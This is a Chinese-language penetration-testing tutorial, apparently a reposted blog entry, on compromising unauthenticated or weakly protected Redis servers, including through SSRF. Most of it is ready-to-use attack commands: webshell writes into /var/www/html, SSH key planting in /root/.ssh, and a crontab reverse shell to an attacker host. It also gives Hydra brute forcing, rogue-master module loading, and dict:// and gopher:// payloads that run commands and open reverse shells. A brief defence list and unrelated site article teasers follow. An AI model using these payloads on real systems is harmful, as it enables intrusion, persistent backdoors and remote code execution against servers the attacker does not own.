Redis渗透SSRF的利用

Redis是什么?

Redis是NoSQL数据库之一,它使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库。默认端口是:6379

工具安装

下载地址:

http://download.redis.io/redis-stable.tar.gz

然后进行配置:

cd redis-stable 
make //全局生效 
cp src/redis-cli /usr/bin/

成功后
image.png

Redis常用的命令

redis-cli -h ip -p port -a pass // 连接redis数据库,如果无密码
info // 返回关于Redis 服务器的各种信息和统计数值
info persistence // 主要查看后台有没有运行任务
flushall										    # 删除所有键
keys *											    # 查询所有键,也可用配合正则查询指定键
get 键名											  # 查询数据
del	键名											  # 删除数据
exists 键名										  # 判断键是否存在config set protected-mode no # 关闭安全模式slaveof host port						 # 设置主节点
config set protected-mode no # 关闭安全模式
config set dir /tmp					 # 设置保存目录
config set dbfilename exp.so # 设置保存文件名
config get dir							 # 查看保存目录
config get dbfilename			   # 查看保存文件名
save											   # 执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。
slaveof no one  						 # 断开主节点	
module list 								 #redis4.x版本以上有模块功能,查询有什么模块
module load exp.so		 			 #加载exp.so文件模块
quit												 #退出

Redis未授权

漏洞原因在于,没有设置密码,攻击者直接连接Redis数据库,进行操作。

redis-cli -h xx.xx.xx.xx -p 6379

redis-cli 默认访问6379端口,可以看见不需要密码,也能执行info操作,说明存在未授权漏洞
image.png

Redis的攻击面

如果没有权限,就会遇到如图类似的这个,无权限。反之则返回OK
image.png

web目录下写webshell

info persistence //获取关于 Redis 持久性配置和状态的信息
config set dir /var/www/html  // 设置要配置的目录
config set dbfilename cike.php  //设置要配置的文件名
set shell "\n\n\n<?php phpinfo();?>\n\n\n"  //设置键名还有键的值
save //最后保存
  • 使用 \n 是为了在 Redis 中正确表示和保留换行符,以确保保存和读取时的一致性。
  • 当 rdb_bgsave_in_progress:0 为0时,save才能保存成功。除非权限不够。
  • rdb_bgsave_in_progress为1时,表示当前已经有一个后台保存操作正在进行中

image.png
最后可以看见 php文件,写入网站成功

替换公钥

攻击机上生成key,id_rsa.pub文件就是我们要替换的

ssh-keygen -t rsa

image.png
然后将公钥导入key.txt文件(前后用\n\n换行,避免和Redis里其他缓存数据混合)

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

image.png
这时候,我们将 key.txt 的公钥内容写入到目标主机的缓冲里:

cat key.txt| redis-cli -h xx.xx.xx.xx -x set ssh

image.png
连接目标主机的Redis,可以看见刚刚写入的ssh键值数据还在

get ssh  //查看ssh键名数据是否存在

image.png
然后执行以下命令:

config set dir /root/.ssh // 设置可写目录
config set dbfilename authorized_keys  //设置可写的键名
save //保存
keys * //查看存在的键名

image.png

通过crontab写反弹shell

连接redis后,使用以下命令

set cike "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/attack_ip/port 0>&1\n\n" //设置cike键名及值
config set dir /var/spool/cron // 使用centos的定时任务目录,ubuntu的为/var/spool/cron/crontabs目录
config set dbfilename shell //设置可写的文件名
save //保存

image.png
keys * 查看存在的键名,可以发现cike写入成功
image.png

使用Hydra爆破Redis密码

hydra -P passwd.txt redis://xx.xx.xx.xx

Redis主从复制导致RCE

漏洞原理

可以大概这样子理解,我们做主机,目标做从机。漏洞版本的范围是在 redis_version: 4.x-5.x之间
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以自定义新的的Redis命令,要通过写c语言并编译出.so文件才可以。
我们可以通过手法来上传so文件,这时候redis的module命令进行加载.so文件,就可以执行一些敏感命令。

远程主从复制

Redis运行远程服务器进行连接的时候,就叫做远程主从复制
使用以下工具:

https://github.com/n0b0dyCN/redis-rogue-server

利用方式:

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip

image.png
如果目标Redis服务开启了认证功能,可以添加 --rpasswd 参数

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip --rpasswd 123456

本地主从复制

当Redis数据库,只允许本地127.0.0.1进行连接,这时候就叫本地主从复制。

dict+ssrf(未授权)

dict协议通常用于探测端口毕竟方便,可以看见有回显
image.png
如果是http探测则会一直连接
image.png
通常使用dict协议爆破密码

?url=dict://0.0.0.0:6379/AUTH:root  //密码认证:root,可以利用这个爆破密码

可以看见返回了OK
image.png
如果是密码错误则如图
image.png
dict协议只能执行一条redis命令,通常用于未授权的redis操纵比较好

?url=dict://0.0.0.0:6379/SLAVEOF:107.149.212.113:15000 //连接我们的主机ip及设置的端口
?url=dict://0.0.0.0:6379/CONFIG:SET:dir:/tmp/
?url=dict://0.0.0.0:6379/config:set:dbfilename:exp.so  
?url=dict://0.0.0.0:6379/MODULE:LOAD:/tmp/exp.so  //加载exp.so
?url=dict://0.0.0.0:6379/slaveof:no:one  //断开主从
?url=dict://0.0.0.0:6379/system.exec:whoami //命令执行
?url=dict://0.0.0.0:6379/system.rev xx.xx.xx.xx 4444 //反弹shell

gopher+ssrf(密码认证)

gopher协议的优点是可以执行多行命令,可以一次性执行完要执行的命令。
空格二次编码后为%2520,换行符二次编码后为%250a;需要在每条命令后加上换行符

gopher://0.0.0.0:6379/_AUTH%2520(密码)%250a(执行的redis命令)%250aquit //执行不同的命令需要换行符加上%250a

主从复制的payload:

gopher://0.0.0.0:6379/_AUTH%2520root%250ainfo%250aquit //查看服务器信息,及进行密码root验证登录息,及进行密码root验证登录
gopher://0.0.0.0:6379/_AUTH%2520root%250aSLAVEOF xx.xx.xx.xx 1111%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aCONFIG SET dir /tmp/%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aconfig set dbfilename exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aMODULE LOAD /tmp/exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.exec whoami%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.rev xx.xx.xx.xx 4444%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aslaveof no one%250aquit

image.png
这里使用这个工具做个例子演示,配合上面的payload进行本地主从复制:

https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

攻击端:

python3 redis_rogue_server.py -v -path exp.so -lport 1111
// 开启主机以及端口,让redis连接这个主机,获取exp.so

image.png
这时候,我们在客户端输入之前的payload:gopher+ssrf,就可以利用了
关于其他的工具:

https://github.com/xmsec/redis-ssrf  //ssrf+gopher
https://github.com/firebroo/sec_tools //gopher 编码payload

防御

  • redis.conf的requirepass更改密码为强密码,防止未授权
  • redis.conf的port进行默认端口更改
  • 不以高权限用户运行redis,如root
  • protected-mode 设置开启保护模式

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/668258.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

pytorch的安装步骤

pytorch的安装步骤

PyTorch是一个深度学习框架&#xff0c;下面是PyTorch的安装步骤&#xff1a; 安装Anaconda&#xff08;可选&#xff09;&#xff1a;Anaconda是一个用于数据科学的Python发行版本&#xff0c;它包含了很多常用的Python库。如果你已经安装了Anaconda&#xff0c;可以跳过这一步…
阅读更多...
Web APIs 1 DOM操作

Web APIs 1 DOM操作

Web APIs 1 引入&#xff1a;const优先Web API 基本认知01 作用和分类02 什么是DOM03 DOM树04 DOM对象 获取DOM对象01 根据CSS选择器获取02 其他获取DOM元素方法 操作元素内容01 innerText 属性02 innerHTML 属性 操作元素属性操作元素的常用属性操作元素的样式属性操作表单元素…
阅读更多...
【FFmpeg】ffplay 命令行参数 ① ( 设置播放分辨率 | 禁用 音频 / 视频 / 字幕 选项 )

【FFmpeg】ffplay 命令行参数 ① ( 设置播放分辨率 | 禁用 音频 / 视频 / 字幕 选项 )

文章目录 一、ffplay 命令行参数 - 设置播放分辨率1、强制设置通用播放分辨率 -x -y 参数2、命令行示例 - 正常播放视频3、命令行示例 - 强制设置播放分辨率4、设置 YUV 播放分辨率 -video_size 和 像素设置 -pixel_format5、全屏播放 -fs 参数 二、ffplay 命令行参数 - 禁用 音…
阅读更多...
C++max函数的使用

C++max函数的使用

在 C 中&#xff0c;max 函数用于找出两个数中的最大值。这个函数在 <algorithm> 头文件中定义&#xff0c;因此使用它之前需要包含这个头文件。max 函数可以用于基本数据类型&#xff08;如 int、float 等&#xff09;和用户自定义类型&#xff0c;只要这些类型支持比较…
阅读更多...
【高质量精品】2024美赛A题22页word版成品论文+数据+多版本前三问代码及代码讲解+前四问思路模型等(后续会更新)

【高质量精品】2024美赛A题22页word版成品论文+数据+多版本前三问代码及代码讲解+前四问思路模型等(后续会更新)

一定要点击文末的卡片&#xff0c;进入后&#xff0c;即可获取完整资料后续参考论文!! 整体分析:这个题目是一个典型的生态系统建模问题&#xff0c;涉及到动物种群的性比例变化、资源可用性、环境因素、生态系统相互作用等多个方面。这个题目的难点在于如何建立一个合理的数学…
阅读更多...
6.函数表达式 - JS

6.函数表达式 - JS

函数表达式 function (someArgs) { someStatements } function name(someArgs) { someStatements } (someArgs) > { someStatements }函数表达式就是要&#xff0c;在一个表达式中定义一个函数&#xff1b;箭头函数也是一个简洁的函数表达式&#xff1b;执行完函数表达式&a…
阅读更多...
JAVA-File

JAVA-File

路径&#xff1a; 相对路径 和 绝对路径&#xff08;带盘符&#xff09;: File对象就表示一个路径&#xff0c;可以是一个文件的路径&#xff0c;也可以示文件夹的路径这个路径 可以存在 或 不存在 File对象的创建方式&#xff1a;三种构造方法 后两种其实就是实现了拼接代码…
阅读更多...
docker容器stop流程

docker容器stop流程

从API route开始看StopContainer接口的调用过程。 // NewRouter initializes a new container router func NewRouter(b Backend, decoder httputils.ContainerDecoder) router.Router {r : &containerRouter{backend: b,decoder: decoder,}r.initRoutes()return r } ... …
阅读更多...
docker搭建Mysql集群准备(一)

docker搭建Mysql集群准备(一)

docker搭建Mysql集群准备 Linux基本知识&#xff1a; 修改机器 IP&#xff0c;变成静态 IP vim /etc/sysconfig/network-scripts/ifcfg-ens33 文件 TYPEEthernet PROXY_METHODnone BROWSER_ONLYno BOOTPROTOstatic IPADDR192.168.190.67 NETMASK255.255.255.0 GAT…
阅读更多...
记录一些git的常用操作

记录一些git的常用操作

文章目录 前言一、记录一些git的常用操作总结 前言 记录一些常用的git操作&#xff0c;持续更新&#xff0c;方便自己查阅。 一、记录一些git的常用操作 创建并切换到新分支 git branch <branch_name> //新建分支 git checkout <branch_name> //切换分支 git …
阅读更多...
数据库管理phpmyadmin

数据库管理phpmyadmin

子任务1-PHPmyadmin软件的使用 本子任务讲解phpmyadmin的介绍和使用操作。 训练目标 1、掌握PHPmyadmin软件的使用方法。 步骤1 phpMyAdmin 介绍 phpmyadmin是一个用PHP编写的软件工具&#xff0c;可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin可以完全对数据库进行…
阅读更多...
用Matlab 2015a svmtrain函数训练的SVM model在2021b无法使用的解决方法

用Matlab 2015a svmtrain函数训练的SVM model在2021b无法使用的解决方法

背景 与r2015a版本的Matlab相比&#xff0c;r2021b版本中包含更多集成好的算法模块&#xff08;尤其是深度学习的模块&#xff09;&#xff0c;想把原来r2015a版本的代码升级到r2021b高版本的Matlab已经采用fitcsvm函数和predict函数替代了旧版本中svmtrain函数和svmclassify函…
阅读更多...
创新大赛专访丨善世集团荣膺2023年度卓越雇主品牌:筑巢引凤,贯彻“人才是第一资源”理念,以人才驱动企业增长

创新大赛专访丨善世集团荣膺2023年度卓越雇主品牌:筑巢引凤,贯彻“人才是第一资源”理念,以人才驱动企业增长

日前&#xff0c;2023第三届全国人力资源创新大赛颁奖典礼暨成果展圆满举行。自2023年10月份启动以来&#xff0c;大赛共吸引了457个案例报名参赛&#xff0c;经组委会专家团队评审严格审核&#xff0c;企业赛道共有103个案例获奖、72家企业、13位个人、7个产业园斩获荣誉。 广…
阅读更多...
3、安全开发-Python-协议库爆破FTPSSHRedisMYSQLSMTP等

3、安全开发-Python-协议库爆破FTPSSHRedisMYSQLSMTP等

用途&#xff1a;个人学习笔记&#xff0c;有所借鉴&#xff0c;欢迎指正&#xff01; 目录 前言&#xff1a; 一、Python-文件传输爆破-ftplib库操作ftp协议 1、关键代码解释&#xff1a; 2、完整代码&#xff1a; 二、Python-登录爆破-paramiko库操作ssh协议 1、关键…
阅读更多...
vue全家桶之状态管理Pinia

vue全家桶之状态管理Pinia

一、Pinia和Vuex的对比 1.什么是Pinia呢&#xff1f; Pinia&#xff08;发音为/piːnjʌ/&#xff0c;如英语中的“peenya”&#xff09;是最接近pia&#xff08;西班牙语中的菠萝&#xff09;的词&#xff1b; Pinia开始于大概2019年&#xff0c;最初是作为一个实验为Vue重新…
阅读更多...
【目标跟踪】相机运动补偿

【目标跟踪】相机运动补偿

文章目录 一、前言二、简介三、改进思路3.1、状态定义3.2、相机运动补偿3.3、iou和ReID融合3.4、改进总结 四、相机运动补偿 一、前言 目前 MOT (Multiple Object Tracking) 最有效的方法仍然是 Tracking-by-detection。今天给大家分享一篇论文 BoT-SORT。论文地址 &#xff0…
阅读更多...
C#学习(十二)——Linq

C#学习(十二)——Linq

一、Linq Language-Integrated Query 语言集成查询 对内存中数据、关系数据和XML数据执行的查询进行检查 例如&#xff0c;在不使用Linq语法时&#xff0c;想要实现查看C盘windows文件夹下最大的前五个文件 class Program {static void Main(string[] args){//实现文件排序功能…
阅读更多...
【力扣 51】N 皇后(回溯+剪枝+深度优先搜索)

【力扣 51】N 皇后(回溯+剪枝+深度优先搜索)

按照国际象棋的规则&#xff0c;皇后可以攻击与之处在同一行或同一列或同一斜线上的棋子。 n 皇后问题 研究的是如何将 n 个皇后放置在 nn 的棋盘上&#xff0c;并且使皇后彼此之间不能相互攻击。 给你一个整数 n &#xff0c;返回所有不同的 n 皇后问题 的解决方案。 每一种…
阅读更多...
【数据结构与算法】(3)基础数据结构 之 链表 单向链表、双向链表、循环链表详细示例讲解

【数据结构与算法】(3)基础数据结构 之 链表 单向链表、双向链表、循环链表详细示例讲解

目录 2.2 链表1) 概述2) 单向链表3) 单向链表&#xff08;带哨兵&#xff09;4) 双向链表&#xff08;带哨兵&#xff09;5) 环形链表&#xff08;带哨兵&#xff09; 2.2 链表 1) 概述 定义 在计算机科学中&#xff0c;链表是数据元素的线性集合&#xff0c;其每个元素都指…
阅读更多...
Rust 本地文档的使用:rustup doc

Rust 本地文档的使用:rustup doc

Rust 是一种系统级编程语言&#xff0c;以其安全性、速度和内存控制能力而闻名。为了方便开发者更好地了解并利用 Rust 标准库和工具链中的功能&#xff0c;Rust 提供了一种内置的文档浏览方式——通过 rustup doc 命令。 安装 rustup 在查阅 Rust 文档之前&#xff0c;确保你…
阅读更多...
最新文章

Copyright @ 2022~2023